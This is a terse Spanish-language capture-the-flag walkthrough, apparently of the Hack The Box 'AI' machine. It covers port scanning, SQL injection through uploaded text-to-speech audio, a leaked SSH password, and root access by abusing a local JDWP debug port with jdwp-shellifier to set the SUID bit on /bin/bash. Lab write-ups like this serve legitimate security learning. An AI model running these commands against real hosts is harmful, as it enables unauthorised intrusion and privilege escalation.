nmap -A -p- -oA ai 10.129.120.18 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA ai 10.129.120.18

nmap -sU -O -p- -oA ai-udp 10.129.120.18

nikto -h 10.129.120.18:80

Pasted image 20220328084631.png

Pasted image 20220328084753.png

whatweb http://10.129.120.18

Pasted image 20220328084931.png

Vamos a http://10.129.120.18

Pasted image 20220328085046.png

Agregamos la ip a /etc/hosts

Pasted image 20220328085255.png

Creamos un archivo de mp3 y lo bajamos de ttsmp3.com

Pasted image 20220328085757.png

ffmpeg ttsMp3.mp3 audio.wav

Pasted image 20220328090049.png

http://10.129.120.18/api.php subimos el archivo wav en esta direccion

Pasted image 20220328090457.png

wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.120.18/FUZZ.php

Pasted image 20220328091027.png

Creamos un script para automatizar el proceso.

Pasted image 20220328101233.png

Corremos el siguiente comando para que lo traduzca a sql

Pasted image 20220328100042.png

Credenciales-> alexa:H,Sq9t6}a<)?q93_

Pasted image 20220328100841.png

ssh alexa@10.129.120.18

Pasted image 20220328100936.png

ps faux | grep 'java'

cd /tmp

Pasted image 20220328101728.png

https://github.com/IOActive/jdwp-shellifier

Copiamos lo que esta en jdwp-shellifier.py y creamos nuestro archivo en este ejemplo es exploit.py

python exploit.py -t 127.0.0.1 --cmd "chmod u+s /bin/bash"

bash -p

Pasted image 20220328102437.png

boxes

copyright©2022 Cu3rv0x all rights reserved